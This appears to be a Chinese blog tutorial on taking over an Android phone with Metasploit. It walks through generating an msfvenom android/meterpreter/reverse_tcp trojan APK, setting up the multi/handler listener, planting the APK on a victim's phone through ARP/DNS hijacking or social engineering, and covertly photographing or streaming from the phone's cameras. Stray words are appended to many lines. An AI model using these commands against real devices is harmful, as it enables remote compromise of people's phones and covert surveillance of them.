MSF入侵安卓手機

MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,很是強大,分別有Windows版和Linux版,工具裏集成了許多微軟公佈的漏洞(0day)。linux

我這裏作測試的系統是Backbox linux ,這是一款網絡滲透,信息安全評估系統。裏邊安裝了許許多多的工具。其中MSF就自帶有。固然還有其它的 好比Kali linux 、Back Track這些等等。android

 

環境:Backbox linux+MSFweb

目標:一臺安卓手機安全

 

既然是入侵安卓手機,確定要先配置一個安卓木馬,那咱們看看本機的IP 網絡

本機IP:192.168.1.6 tcp

在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk工具

之前的MSF老版本是用msfpayload生成木馬 如今在新版本中都用msfvenom代替了,因此有些朋友在終端輸入msfpayload的時候 會提示測試

msfpayload沒法找到命令 因此使用msfvenom便可,這裏LHOST 對應的是本機的IP地址 LPORT對應你要監聽的端口 而後生成木馬的路徑spa

這樣咱們就在/root/路徑下生成了一個APK的安卓木馬文件,至於木馬的免殺暫且不談。如今咱們在來啓動MSF工具3d

輸入命令:msfconsole

而後輸入:

1. use exploit/multi/handler 加載模塊

2. set payload android/meterpreter/reverse_tcp  選擇Payload

3.show options 查看參數設置

咱們看見payload裏邊有兩個參數要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 如今咱們來更改設置

1.set LHOST 192.168.1.6 這裏的地址設置成咱們剛纔生成木馬的IP地址

2.set LPORT 5555 這裏的端口設置成剛纔咱們生成木馬所監聽的端口

3.exploit 開始執行漏洞 開始監聽...

OK,一切準備工做準備就緒。。。如今要作的就是把木馬文件搞到人家的手機上,思路有不少 能夠DNS arp劫持欺騙 只要對方用手機下載文件 就會下載咱們的木馬文件

還有社工什麼等等的,這裏我就簡單的把木馬文件弄我本身的手機上作測試

 

安裝完成後 會在桌面上生成一個MainActivity的程序圖標 這個就是咱們剛纔生成的木馬 當咱們點擊了這個圖標 手機會沒有任何反應 其實木馬已經開始運行起來了

咱們能夠在咱們的MSF裏看見有一個會話鏈接了

這樣對方的手機就就被咱們控制了,查看手機系統信息,輸入命令 sysinfo

webcam_list查看手機攝影頭有幾個 這裏顯示兩項 分別表示有先後兩個攝像頭

 webcam_snap 隱祕拍照功能

後邊跟上參數-i 指定使用那個攝像頭拍照

能夠看見咱們分別對先後攝像頭都拍了照 保存到了桌面上

還能夠輸入命令 webcam_stream 開啓攝像頭 

其它的功能還有更多 。暫時就先到這吧。。。

相關文章
相關標籤/搜索